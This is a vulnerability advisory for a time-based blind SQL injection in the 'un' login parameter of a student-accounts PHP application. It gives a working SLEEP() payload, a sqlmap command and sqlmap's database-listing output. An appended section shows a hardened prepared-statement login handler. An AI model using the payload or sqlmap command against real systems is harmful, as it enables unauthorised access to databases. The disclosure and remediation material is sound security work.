Monitoring Of Students Cyber Accounts System 1.0 SQL Injection

2021.03.13
Credit: Richard Jones
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Monitoring of Students Cyber Accounts System | 'un' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-12
# Vendor Homepage: https://www.sourcecodester.com/php/11743/monitoring-students-cyber-accounts.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11743&title=Monitoring+of+Students+Cyber+Accounts+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:
#Parameter: un (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: un=aaaaa' AND (SELECT 2967 FROM (SELECT(SLEEP(5)))fGEg) AND 'VDNV'='VDNV&up=bbbbbb&log=Login

#Example:
# sqlmap -u http://127.0.0.1/MSCAB/login.php --risk 3 --level 3 --batch --dbs --data="un=asd&up=asdas&log=Login"

#Results:
#available databases [17]:
#[*] asidatabase
#[*] attendance
#[*] attendance_management
#[*] bilal
#[*] carrental
#[*] chatme
#[*] dragonhousedb
#[*] fbc_reviewer
#[*] hrm
#[*] information_schema
#[*] mscabdb
#[*] mysql
#[*] performance_schema
#[*] phpmyadmin
#[*] sourcecodester_mysqli
#[*] subriondb
#[*] test
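A hardened form of the login handler, as an added example that is not the application's own code and not part of the original advisory: the 'un' and 'up' POST fields are bound as statement parameters instead of being placed in the SQL text. The table and column names (users, username, password_hash), the database name, account and redirect target are assumptions; only the field names un, up and log come from the advisory.

```php
<?php
// Added example (not the vendor's code). Hypothetical schema: users(id, username, password_hash).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // fail loudly, never build SQL from errors

function find_user(mysqli $db, string $un): ?array
{
    // The value travels separately from the SQL text, so a quote in $un cannot
    // close the string literal and append a SLEEP() subquery.
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $un);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd (bundled with XAMPP)
    $stmt->close();
    return $row ?: null;
}

function login(mysqli $db, array $post): bool
{
    $un = $post['un'] ?? '';
    $up = $post['up'] ?? '';
    // Reject array-valued parameters, empty names and oversized input before querying.
    if (!is_string($un) || !is_string($up) || $un === '' || strlen($un) > 64) {
        return false;
    }
    $row = find_user($db, $un);
    // The password is checked in PHP against a stored hash and never enters SQL.
    return $row !== null && password_verify($up, $row['password_hash']);
}

if (isset($_POST['log'])) {
    // Placeholder credentials. Use a dedicated account limited to the application's
    // schema: the results above list 17 databases visible through the app's connection.
    $db = new mysqli('127.0.0.1', 'app_user', 'CHANGE_ME', 'app_db');
    $db->set_charset('utf8mb4');
    session_start();
    if (login($db, $_POST)) {
        session_regenerate_id(true);      // new session id after authentication
        $_SESSION['user'] = $_POST['un'];
        header('Location: index.php');    // hypothetical landing page
    } else {
        http_response_code(401);
        echo 'Invalid username or password.';
    }
}
```

With the bound parameter, the payload above is compared as a literal username and the response time no longer depends on SLEEP().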

